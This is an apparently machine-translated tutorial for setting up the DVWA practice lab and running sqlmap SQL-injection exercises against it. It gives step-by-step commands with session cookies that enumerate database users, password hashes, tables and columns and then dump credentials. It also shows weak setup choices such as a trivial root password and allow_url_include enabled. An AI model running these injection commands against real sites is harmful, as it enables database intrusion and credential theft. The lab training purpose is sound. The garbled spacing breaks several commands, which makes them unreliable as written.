Shulou(Shulou.com)06/01 Report--

The following content mainly brings you the DVWA process of the test and exercise system. The knowledge mentioned here is slightly different from the books. It is summed up by professional and technical personnel in the process of contact with users, and has a certain value of experience sharing. I hope to bring help to the majority of readers.

Deploy DVWA, a test exercise system

1. Download the DVWA package

Official download address: http://www.dvwa.co.uk/, the latest version is: DVWA-1.9

Wget https://codeload.github.com/ethicalhack3r/DVWA/zip/master

two。 Deploy the linux environment

Yum install-y httpd mysql mysql-server php php-mysql php-gd

3. Enable httpd and mysqld services

Service httpd start

Service mysqld start

4. Test the parsing of php by htttp. The browser accesses http://ip/test.php normally.

Vim / var/www/html/test.php

Write:

5. Change the password of mysql

Mysqladmin-uroot password "123456"

6. Extract the DVWA-1.9.zip to / var/www/html and change the owner to apache

Unzip DVWA-1.9.zip-d / var/www/html

Chown-R apache:apache / var/www/html/DVWA-1.9

7. Change the DVWA profile database password to 123456

Vim / var/www/html/DVWA-1.9/config/config.inc.php

Change the password:

$_ DVWA ['db_password'] =' 123456'

8. Enter the web installation interface of DVWA, http://ip/DVWA-1.9/setup.php, and report an error

Solution:

1) Edit the configuration file vim / etc/php.ini of php

Allow_url_include = On

2) Edit DVWA configuration file vim / var/www/html/DVWA-1.9/config/config.inc.php

Find the link to create the public key and private key: fill in the configuration file after applying for https://www.google.com/recaptcha/admin/create:

Public key: 6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb

Private key: 6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k

9. Restart http to make the modified configuration file effective, refresh the web interface, and eliminate errors

Service httpd restart

10. Click Create/Reset Database and automatically jump to the login screen. Default username / password: admin/password

At this point, DVWA has been deployed

Install the SQLmap vulnerability check tool

1. Official download: http://sqlmap.org/http://sqlmap.org/

Version: sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

two。 Extract the sqlmap and execute

Description: the tool is written in python, need to install python, it is not compiled language, but executive language, run directly

Command tar-zxvf sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

Command. / sqlmap.py

3. Set command aliases, modify vim / etc/profile, and directly use the sqlmap command

Command alias sqlmap='python / usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'

Command source / etc/profile

III. Actual combat

Practice 1: enumerate usernames and passwords for login MYSQL data

Practice 2: enumerate all databases

Practice 3: enumerate the data tables of the specified database

Practice 4: get information about all columns in a specified database and table

Practice 5: enumerate all user names and passwords in the specified data table

Environmental preparation:

1) Log in to http://192.168.1.124/DVWA-1.9 and set the security level to the lowest

2) Open the Firefox browser TamperData plug-in and wait for the cookies value to be obtained.

3) in the [SQL Injection] item, the submission User ID is 22 (id=22 appears in the address bar, which is the injection point of MySQL)

Get the injection point: http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#

4) TamperData pop-up window to obtain cookies value: security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552

Practice 1: enumerate usernames and passwords for login MYSQL data

Sqlmap syntax parameters:

-u: specify the target URL, which is the injection point

-- cookies: cookies value of the current session

-b: get the database type and retrieve the database management system identity

-- current-db: get the current database

-- current-user: gets the user used by the current login database

Command:

Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-- cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-b-- current-db-- current-user

Description: reply Y according to the prompt and continue

Result: the current database is dawa and the user is root@localhost

Practice 2: enumerate all databases

Sqlmap syntax parameters:

-- users: enumerates database user names

-password: enumerates the passwords of database users (hash)

Command:

Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-string=" Surname "- users-password

Description: select the dictionary file under the directory and crack it violently.

Result: the user name of the database is root, and the password is also in plaintext form 123456

Practice 3: enumerate databases and data tables of specified databases

Sqlmap syntax parameters:

-- dbs: enumerates the current database

Command:

Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-- cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-- string=" Surname "--dbs

Result: all databases under mysql

Command:

Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-- string=" Surname "- D dvwa-- tables

Result: all the tables in the dvwa library

Practice 4: get information about all columns in a specified database and table

Sqlmap syntax parameters:

-D: specified database

-T: specify the data table in the database

-- columns: get column information

Command:

Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-- string=" Surname "- D dvwa-T users-- columns

Result: dvwa library, all field information in users table

Practice 5: enumerate all user names and passwords in the specified data table

Sqlmap syntax parameters:

-C: enumerate columns in the data table

-- dump: stores data table items

Command:

Sqlmap-u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#"-cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552'-- string=" Surname "- D dvwa-T users-C user,password-- dump

Result: dvwa library, user field and password field information in users table. Finally, the information in table is transferred to file.

For the above test drill system DVWA process, if you need to know more, you can continue to follow our industry promotion, if you need professional solutions, you can contact the pre-sales and after-sales on the official website. I hope this article can bring you some knowledge updates.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.